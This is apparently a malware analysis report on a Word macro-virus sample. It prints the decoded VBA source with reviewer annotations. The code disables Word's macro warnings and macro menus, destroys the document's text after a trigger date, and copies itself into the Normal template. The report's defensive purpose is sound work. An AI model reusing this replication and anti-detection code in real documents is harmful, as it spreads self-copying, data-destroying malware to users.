Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ad8545a58153db97…

MALICIOUS

Office (OLE)

36.0 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 53116b0b7e38d7ecba006a53c3dc0ce3 SHA-1: 17ca8e012ebc7c509cdd53a03a3dd69cd3dfffdd SHA-256: ad8545a58153db97222d563074e5f8b3f35a495357ba2af1cd23f7f8a219c27e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

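The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro attempts to overwrite the document content with a fake licensing warning, likely as a distraction or to coerce the user. The presence of the 'Doc.Trojan.Marker-36' and 'Win.Trojan.C-286' ClamAV detections strongly indicates malicious intent, likely to download and execute a second-stage payload. Note that in the extracted script preview below, the fake licensing text is written by Document_Close once the system date reaches a hard-coded date, and the visible code turns off Word's macro warning and copies itself between the document and the Normal template. No download or execution routine appears in the visible portion, which is truncated, so the second-stage assessment should be treated as unconfirmed.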

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-36 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-36
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15447 bytes
SHA-256: fa8c25e396f21e064a380595c67cbc859fdfc495716fa4a8bfdb9f36c8fefd72
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' [analysis] Module header attributes emitted with the extracted VBA source. VB_Name
' "ThisDocument" marks this as the document's own class module, which is where Word
' looks for the Document_Open and Document_Close event handlers defined further down.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True








































































' [analysis] Word event handler that runs when the document is closed. In this sample
' it (1) turns off two Word safety prompts, (2) once the system date reaches the stored
' myDate, replaces the document text with a fake licensing notice and saves, and
' (3) copies this module's code between the active document and the Normal template.
' Lines starting with "' [analysis]" are reviewer annotations; every other line,
' including the author's own comments, is unchanged from the extracted source.
Private Sub Document_Close()
' [analysis] Errors are ignored from here on, so any failing step below is skipped silently.
On Error Resume Next
    Dim myDate As Date
    ' [analysis] Hard-coded trigger date. If the blank lines preceding this Sub in the
    ' listing belong to the module, this assignment sits on module line 76, the one line
    ' the copy routine below leaves out and rewrites - confirm against the raw module.
    myDate = #12/13/2000#
    ' [analysis] In VBA only the last name in each Dim takes the stated type
    ' (NI As Boolean, nt As Object); the other names are Variant.
    Dim SaveDOC, SaveDOT, DI, NI As Boolean
    Dim ad, nt As Object
    Dim rixCode As String
    ' [analysis] Marker string. This Const line itself contains it, so a module that
    ' holds this code matches the Find calls below.
    Const mmX = "M-M-x"
'Tarlac State University Sucks
    ' [analysis] First VBComponent of the open document (ad) and of the Normal template (nt).
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    ' [analysis] DI / NI: whether the marker is already present in the document / template module.
    DI = ad.CodeModule.Find(mmX, 1, 1, 10000, 10000)
    NI = nt.CodeModule.Find(mmX, 1, 1, 10000, 10000)
    ' [analysis] Turns off Word's macro-virus warning and the prompt shown before the
    ' Normal template is saved, so neither dialog alerts the user.
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
        ' [analysis] Destructive payload: on or after myDate the whole document is
        ' selected, deleted, replaced with the three lines of text below, and saved.
        ' Recovery then depends on backups or earlier versions of the file.
        If Date >= myDate Then
            With Selection
                .WholeStory
                .Delete Unit:=wdCharacter, Count:=1
                .TypeText Text:="Sorry, Microsoft has determined that this copy of MS Word is not licensed!"
                .TypeParagraph
                .TypeText Text:="It is illegal to use this product. You have been warned!!!!!"
                .TypeParagraph
                .TypeText Text:="Please use/buy an original licensed copy of this product. Thank you"
            End With
            ActiveDocument.Save
        End If
'AMA CLC Tarlac Sucks
'*********************************
    ' [analysis] Replication step. It runs only when exactly one of document/template
    ' carries the marker (Xor) and the document's save format is Word document or template.
    ' Detection note: a document macro that reads and rewrites VBProject code modules
    ' (Lines / DeleteLines / AddFromString) is a strong self-replication indicator.
    ' NOTE(review): this needs programmatic access to the VBA project; later Office
    ' versions gate that behind "Trust access to the VBA project object model" - confirm
    ' the setting is off on affected hosts.
    If (DI = True Xor NI = True) And _
       (ActiveDocument.SaveFormat = wdFormatDocument Or _
       ActiveDocument.SaveFormat = wdFormatTemplate) Then
'DOT
      ' [analysis] Document carries the marker: rebuild the code as lines 1-75, a fresh
      ' "myDate=#...#" line from makeMyDate (its body is truncated in this preview), then
      ' line 77 onward, and write the result over the Normal template's module.
      If DI = True Then
        ' [analysis] Remembers whether the template had unsaved changes before it is modified.
        SaveDOT = NormalTemplate.Saved
        rixCode = ad.CodeModule.Lines(1, 75)
        rixCode = rixCode & vbCrLf & vbTab & "myDate=#" & makeMyDate & "#"
        ' [analysis] The count argument exceeds the lines remaining; presumably this
        ' returns everything through the end of the module - confirm.
        rixCode = rixCode & vbCrLf & ad.CodeModule.Lines(77, ad.CodeModule.CountOfLines)
        ' [analysis] Appends one comment line holding the current time and date. Trailing
        ' lines of this form in a recovered module may record when copies were made
        ' (local clock), which can help build a timeline.
        rixCode = rixCode & vbCrLf & "' " & Format(Time, "HH.MM.SS-") & Format(Date, "mm.dd.yy")
        nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
        nt.CodeModule.AddFromString rixCode
        ' [analysis] The template is saved here only if it had no unsaved changes beforehand.
        If SaveDOT = True Then NormalTemplate.Save
      End If
'STI Tarlac Sucks
'DOC
      ' [analysis] And binds tighter than Or, so this reads
      ' (NI And Not DI) Or document-has-unsaved-changes. When DI is True and the document
      ' is unsaved, this branch also runs, right after the DOT branch above.
      If NI = True And DI = False Or ActiveDocument.Saved = False Then
        SaveDOC = ActiveDocument.Saved
        ' [analysis] Same rebuild as above, in the other direction: template code is
        ' written over the active document's module.
        rixCode = nt.CodeModule.Lines(1, 75)
        rixCode = rixCode & vbCrLf & vbTab & "myDate=#" & makeMyDate & "#"
        rixCode = rixCode & vbCrLf & nt.CodeModule.Lines(77, nt.CodeModule.CountOfLines)
        rixCode = rixCode & vbCrLf & "' " & Format(Time, "HH.MM.SS-") & Format(Date, "mm.dd.yy")
        ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
        ad.CodeModule.AddFromString rixCode
        ' [analysis] The document is saved here only if it had no unsaved changes beforehand.
        If SaveDOC = True Then ActiveDocument.Save
      End If
    End If
'All the rest sucks even more
End Sub

' [analysis] Word event handler that runs when the document is opened. Nothing here
' copies code or touches document text; it switches off warning prompts and removes
' the UI a user would normally use to see or manage macros. Lines starting with
' "' [analysis]" are reviewer annotations; the code itself is unchanged.
Private Sub Document_Open()
' [analysis] Errors are ignored, so a step that fails (e.g. a menu item already gone) is skipped silently.
On Error Resume Next
    ' [analysis] Disables the macro-virus warning, the Normal-template save prompt, the
    ' file-conversion confirmation and the document-properties prompt.
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
        .SavePropertiesPrompt = False
    End With
    ' [analysis] Clears the "read-only recommended" flag on the open document.
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    ' [analysis] Disables the Alt+F11 and Alt+F8 key bindings (by default the Visual
    ' Basic Editor and the Macros dialog in Word).
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    ' [analysis] Hides and disables the "Control Toolbox" and "Visual Basic" toolbars.
    ' Each Protection value is assigned, not combined, so the second assignment
    ' (msoBarNoCustomize) replaces the first (msoBarNoChangeVisible).
    CommandBars("Control Toolbox").Visible = False
    CommandBars("Control Toolbox").Enabled = False
    CommandBars("Control Toolbox").Protection = msoBarNoChangeVisible
    CommandBars("Control Toolbox").Protection = msoBarNoCustomize
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    ' [analysis] Removes the Macro and Customize... entries from the Tools menu.
    ' Triage note: a missing Tools > Macro entry or an unresponsive Alt+F11 in Word is
    ' a visible symptom worth checking against the Normal template's code module.
    CommandBars("Tools").Controls("Macro").Delete
    CommandBars("Tools").Controls("Customize...").Delete
    ' [analysis] NOTE(review): the customization context is set only after the changes
    ' above, so where those key-binding and menu changes were stored depends on the
    ' context in effect before this line - confirm when planning cleanup.
    CustomizationContext = NormalTemplate
End Sub

Private Function makeMyDate() As Date
    Dim dM, dD, dY 
... (truncated)